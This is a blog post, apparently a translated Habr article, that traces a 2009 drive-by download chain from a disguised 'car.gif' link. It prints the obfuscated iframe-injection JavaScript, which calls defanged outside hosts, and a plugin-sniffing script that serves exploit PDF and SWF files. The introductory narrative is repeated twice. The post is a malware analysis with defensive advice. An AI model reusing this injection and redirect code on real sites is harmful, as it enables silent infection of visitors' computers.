New-old pdf exploit
ps2: There is no virus in this topic, although “Avastu” may seem different (thanks to edio )
It all started with an innocent message in icq from my good friend:
Like nothing suspicious. Well, I think, I will come. There render some BMW. All in all, quite enjoyable. The picture has already been loaded, and the page load indicator did not end there ... it worked for me like a disturbing bell. I immediately poked Esc, after which Ognelis stopped the download in the tab. With the thought that it is necessary to understand, I (from something) decided to look at the source code of the picture. In theory, there should have been some kind of nonsense, as in any gif-jpeg image, BUT! The reality was much more interesting. So, we look at the source image in the browser:
Wow! Yes, it's not a picture at all.
So, I wonder what's in javascript?
We look!
Redirect. Well, not to get used, we go on a chain further:
')
This is the end of the malicious chain:
That is, welcome to the pdf computer (evenLike.pdf is infected with Exploit.Win32.Pidief.bfz) and swf, our most favorite friends. I did not begin to disassemble further: these script and documents exploit a fresh July vulnerability ( topic on Habré ), the February one , and maybe even the older one. If you remember, at one time there was a link to the “viral video” on the Alfastrach website, which, as it turned out, was viral without quotes , because it was put on the user's computer Trojan-Spy.Win32.Zbot.gkj.
Want to play? You can easily download these documents to yourself, and see what each of them is doing. If this is not enough, then there is another "example" , but the author warns that 'This virus is srs business!' (“This virus is a serious business”).
So, in conjunction with TechBytesDaily, I urge you to turn off the pdf display in the browser window, no matter how convenient it may seem. Always save pdf documents, and whenever possible, use the free, not-so-hover counterparts of Adobe Acrobat (like Foxit Reader, Sumatra PDF). Unfortunately, the plugin from Adobe does not adequately filter the received content before giving it to show it to the user in the browser.
And once again about security: be attentive to incomprehensible messages even from well-known people, especially if it contains a link to an unknown resource and there is no personal comment from the author.
ps In http links to hxxp fixed by me specifically.
It all started with an innocent message in icq from my good friend:
07/31/2009 18:45:11 xyz : see hxxp: //watnhome.com/images/car.gif :)
Like nothing suspicious. Well, I think, I will come. There render some BMW. All in all, quite enjoyable. The picture has already been loaded, and the page load indicator did not end there ... it worked for me like a disturbing bell. I immediately poked Esc, after which Ognelis stopped the download in the tab. With the thought that it is necessary to understand, I (from something) decided to look at the source code of the picture. In theory, there should have been some kind of nonsense, as in any gif-jpeg image, BUT! The reality was much more interesting. So, we look at the source image in the browser:
view-source:hxxp://watnhome.com/images/car.gifWow! Yes, it's not a picture at all.
< img src ="WorleyVision5.jpg" >
< script type ="text/javascript" src ="js.js" ></ script >So, I wonder what's in javascript?
We look!
view-source:hxxp://watnhome.com/images/js.jsdocument .write( '\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e' )document .write( '<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"></iframe>' )Redirect. Well, not to get used, we go on a chain further:
view-source:hxxp://listenz.org/stats/ru1.php<script type= "text/javascript" > document .write( '\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0076\u0065\u0072\u0069\u0076\u0065\u006c\u006c\u002e\u0063\u006f\u006d\u002f\u0075\u0070\u0064\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e' )</script><script type= "text/javascript" > document .write( '<iframe src="hxxp://verivell.com/upd/index.php" style="display:none"></iframe>' )</script>')
This is the end of the malicious chain:
view-source:hxxp://verivell.com/upd/index.php<script>
function PDF_SWF_Iframe(sCn)
{
document .write(sCn);
}
if (navigator.userAgent.indexOf( 'MSIE' ) != -1)
{
PDF = new Array( 'AcroPDF.PDF' , 'PDF.PdfCtrl' );
for (i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
PDF_SWF_Iframe( '<iframe src=evenLike.pdf></iframe>' );
}
}
catch (e){}
}
try
{
obj = new ActiveXObject( 'ShockwaveFlash.ShockwaveFlash' );
if (obj)
{
PDF_SWF_Iframe( '<iframe src=normalDummyBelief.swf></iframe>' );
}
}
catch (e){}
}
else
{
for (i = 0; i <= navigator.plugins.length; i++)
{
var plugin = navigator.plugins[i].name;
if ((plugin.indexOf( 'Adobe Acrobat' ) != -1) || (plugin.indexOf( 'Adobe PDF' ) != -1))
{
PDF_SWF_Iframe( '<iframe src=evenLike.pdf></iframe>' );
}
if (plugin.indexOf( 'Flash' ) != -1)
{
PDF_SWF_Iframe( '<iframe src=normalDummyBelief.swf></iframe>' );
}
}
}
</script>
* This source code was highlighted with Source Code Highlighter .That is, welcome to the pdf computer (evenLike.pdf is infected with Exploit.Win32.Pidief.bfz) and swf, our most favorite friends. I did not begin to disassemble further: these script and documents exploit a fresh July vulnerability ( topic on Habré ), the February one , and maybe even the older one. If you remember, at one time there was a link to the “viral video” on the Alfastrach website, which, as it turned out, was viral without quotes , because it was put on the user's computer Trojan-Spy.Win32.Zbot.gkj.
Want to play? You can easily download these documents to yourself, and see what each of them is doing. If this is not enough, then there is another "example" , but the author warns that 'This virus is srs business!' (“This virus is a serious business”).
So, in conjunction with TechBytesDaily, I urge you to turn off the pdf display in the browser window, no matter how convenient it may seem. Always save pdf documents, and whenever possible, use the free, not-so-hover counterparts of Adobe Acrobat (like Foxit Reader, Sumatra PDF). Unfortunately, the plugin from Adobe does not adequately filter the received content before giving it to show it to the user in the browser.
And once again about security: be attentive to incomprehensible messages even from well-known people, especially if it contains a link to an unknown resource and there is no personal comment from the author.
ps In http links to hxxp fixed by me specifically.
Source: https://habr.com/ru/post/65927/
All Articles